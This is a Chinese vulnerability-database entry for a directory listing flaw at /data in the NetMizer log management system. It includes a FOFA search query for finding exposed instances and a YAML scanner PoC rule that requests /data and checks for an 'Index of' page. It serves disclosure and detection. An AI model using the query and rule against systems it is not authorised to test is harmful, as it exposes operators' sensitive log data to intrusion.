netmizer-log-management-data-directory-traversal: NetMizer 日志管理系统 data 目录遍历漏洞

日期: 2025-08-01 | 影响软件: NetMizer日志管理系统 | POC: 已公开

漏洞描述

北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用该漏洞获取敏感信息。 fofa: title="NetMizer 日志管理系统"

PoC代码[已公开]

id: netmizer-log-management-data-directory-traversal

info:
  name: NetMizer 日志管理系统 data 目录遍历漏洞
  author: zan8in
  severity: medium
  description: |-
    北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用该漏洞获取敏感信息。
    fofa: title="NetMizer 日志管理系统"
  tags: netmizer,traversal
  created: 2025/03/19

rules:
  r0:
    request:
      method: GET
      path: /data
    expression: response.status == 200 && response.body.bcontains(b'Index of /data') && response.body.bcontains(b'Parent Directory')
expression: r0()

相关漏洞推荐